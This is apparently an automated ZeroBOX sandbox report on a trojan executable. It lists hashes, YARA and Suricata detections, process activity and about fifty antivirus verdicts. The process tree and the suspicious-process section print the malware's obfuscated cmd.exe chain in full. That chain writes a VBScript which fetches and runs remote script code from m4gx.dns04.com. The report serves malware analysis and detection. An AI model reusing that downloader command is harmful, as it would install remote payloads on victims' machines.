Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 25, 2023, 11:13 a.m.	Oct. 25, 2023, 11:22 a.m.

Size	1.0MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`897af5616bfd6af5b687876924f39ee3`
SHA256	`8a013b99a9b82e0f67b3e472f7627052915507916311f10cac5b69e87f3d19d4`
CRC32	`C7929FCF`
ssdeep	`12288:Tq73genXXHoA/of0L4enXXHoA/of0LOOR1:uZnR/eUhnR/eUOG`
PDB Path	C:\U3\GtYD2\Release\GtYD2.pdb
Yara	Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature IsPE32 - (no description) OS_Processor_Check_Zero - OS Processor Check

FX_432661.exe "C:\Users\test22\AppData\Local\Temp\FX_432661.exe"
1132
- cmd.exe C:\Windows\system32\cmd.exe /c echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9.vbs
  316
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
    2084
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="sq048=".":r54="i":y8628="g":k4js7=":":GetO" 1>C:\Users\Public\bjk6l9.vbs"
    2120
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
    2200
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")" 1>>C:\Users\Public\bjk6l9.vbs"
    2236
  - cmd.exe cmd /c start C:\Users\Public\bjk6l9.vbs
    2288
    - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\bjk6l9.vbs"
      2356

Name	Response	Post-Analysis Lookup
m4gx.dns04.com	A 206.71.149.162	206.71.149.162

IP Address	Status	Action
164.124.101.2	Active	Moloch
206.71.149.162	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49170 -> 206.71.149.162:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49172 -> 206.71.149.162:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 206.71.149.162:443 -> 192.168.56.103:49173	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 206.71.149.162:443 -> 192.168.56.103:49174	2260001	SURICATA Applayer Wrong direction first Data	Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 25, 2023, 11:13 a.m.			0	0

This executable has a PDB path (1 event)

pdb_path

C:\U3\GtYD2\Release\GtYD2.pdb

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Oct. 25, 2023, 11:14 a.m.	stacktrace: CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x750bd08c TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x750b964b TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x750a4d6b TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x750a6f7c CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x750ae825 TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x750a6002 TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x750a5fe8 TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x750a49e3 TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x750a5a20 RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x778d9a91 LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x778f8f10 RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x778f8e5c ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x757f7a25 wscript+0x2fbd @ 0x2e2fbd BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25 exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4 exception.instruction: call dword ptr [ecx + 0xc] exception.module: MSCTF.dll exception.exception_code: 0xc0000005 exception.offset: 278260 exception.address: 0x750d3ef4 registers.esp: 4453796 registers.edi: 0 registers.eax: 2599896 registers.ebp: 4453824 registers.edx: 1 registers.ebx: 0 registers.esi: 9289048 registers.ecx: 1944925564	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Oct. 25, 2023, 11:14 a.m.

stacktrace:

CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x750bd08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x750b964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x750a4d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x750a6f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x750ae825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x750a6002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x750a5fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x750a49e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x750a5a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x778d9a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x778f8f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x778f8e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x757f7a25
wscript+0x2fbd @ 0x2e2fbd
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x750d3ef4
registers.esp: 4453796
registers.edi: 0
registers.eax: 2599896
registers.ebp: 4453824
registers.edx: 1
registers.ebx: 0
registers.esi: 9289048
registers.ecx: 1944925564

Creates executable files on the filesystem (1 event)

file	C:\Users\Public\bjk6l9.vbs

Creates a suspicious process (4 events)

cmdline	C:\Windows\system32\cmd.exe /S /D /c" set /p="sq048=".":r54="i":y8628="g":k4js7=":":GetO" 1>C:\Users\Public\bjk6l9.vbs"
cmdline	C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")" 1>>C:\Users\Public\bjk6l9.vbs"
cmdline	C:\Windows\system32\cmd.exe /c echo\|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo\|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9.vbs
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo"

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Wscript.exe initiated network communications indicative of a script based payload download (1 event)

Time & API	Arguments	Status	Return	Repeated
HttpOpenRequestW Oct. 25, 2023, 11:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582928 http_method: GET referer: path: //g1	1	13369356	0

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (11 events)

Time & API	Arguments	Status	Return
HttpOpenRequestW Oct. 25, 2023, 11:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 12582928 http_method: GET referer: path: //g1	1	13369356
send Oct. 25, 2023, 11:13 a.m.	buffer: ! socket: 756 sent: 1	1	1
send Oct. 25, 2023, 11:13 a.m.	buffer: qme8yãÖ¢$øäÒY±±T×*O¯0Æ8ª/5 ÀÀÀ À 28,ÿm4gx.dns04.com socket: 876 sent: 118	1	118
send Oct. 25, 2023, 11:13 a.m.	buffer: ! socket: 756 sent: 1	1	1
send Oct. 25, 2023, 11:13 a.m.	buffer: ! socket: 756 sent: 1	1	1
send Oct. 25, 2023, 11:13 a.m.	buffer: qme8yäÑýì8Á"¶©÷uLäHWìY¥/5 ÀÀÀ À 28,ÿm4gx.dns04.com socket: 876 sent: 118	1	118
send Oct. 25, 2023, 11:13 a.m.	buffer: ! socket: 756 sent: 1	1	1
send Oct. 25, 2023, 11:13 a.m.	buffer: ! socket: 756 sent: 1	1	1
send Oct. 25, 2023, 11:13 a.m.	buffer: 51e8yäÐ¢qÃwf}öÅfBÛnØtõýmo ÿ socket: 876 sent: 58	1	58
send Oct. 25, 2023, 11:13 a.m.	buffer: ! socket: 756 sent: 1	1	1
send Oct. 25, 2023, 11:13 a.m.	buffer: ! socket: 756 sent: 1	1	1

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2288 resumed a thread in remote process 2356
NtResumeThread Oct. 25, 2023, 11:13 a.m.	thread_handle: 0x00000238 suspend_count: 1 process_identifier: 2356	1	0	0

The process wscript.exe wrote an executable file to disk (1 event)

file	C:\Windows\SysWOW64\wscript.exe

File has been identified by 50 AntiVirus engines on VirusTotal as malicious (50 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Generic.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.69973040
FireEye	Generic.mg.897af5616bfd6af5
Skyhigh	BehavesLike.Win32.Generic.tm
ALYac	Trojan.GenericKD.69973040
Cylance	unsafe
VIPRE	Trojan.GenericKD.69973040
Sangfor	Trojan.Win32.Agent.Vvk5
CrowdStrike	win/malicious_confidence_100% (W)
BitDefender	Trojan.GenericKD.69973040
K7GW	Trojan ( 005ab3fa1 )
K7AntiVirus	Trojan ( 005ab3fa1 )
BitDefenderTheta	Gen:NN.ZexaE.36792.avW@aShlPPhi
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/Agent.AFVT
APEX	Malicious
Kaspersky	UDS:DangerousObject.Multi.Generic
Tencent	Win32.Trojan.Agent.Tdkl
Sophos	Mal/Generic-S
F-Secure	Trojan.TR/Agent.mrbbs
DrWeb	Trojan.Siggen21.49399
Trapmine	suspicious.low.ml.score
Emsisoft	Trojan.GenericKD.69973040 (B)
SentinelOne	Static AI - Suspicious PE
MAX	malware (ai score=89)
GData	Trojan.GenericKD.69973040
Webroot	W32.Trojan.GenKD
Google	Detected
Avira	TR/Agent.mrbbs
Varist	W32/ABRisk.GTAZ-0795
Antiy-AVL	Trojan/Win32.Wacatac
Gridinsoft	Ransom.Win32.Wacatac.sa
Xcitium	Malware@#25r4jjivpccpl
Arcabit	Trojan.Generic.D42BB430
ZoneAlarm	UDS:DangerousObject.Multi.Generic
Microsoft	Trojan:Win32/Casdet!rfn
Cynet	Malicious (score: 99)
AhnLab-V3	Trojan/Win.Generic.R617107
McAfee	Artemis!897AF5616BFD
DeepInstinct	MALICIOUS
Malwarebytes	Malware.AI.2449542126
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	TROJ_GEN.R014H0DJO23
Rising	Trojan.Generic@AI.100 (RDML:w7xvx4wo2d+WLq4BjTme0g)
Ikarus	Trojan.Win32.Agent
MaxSecure	Trojan.Malware.300983.susgen
AVG	Win32:MalwareX-gen [Trj]
Avast	Win32:MalwareX-gen [Trj]

FX_432661.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All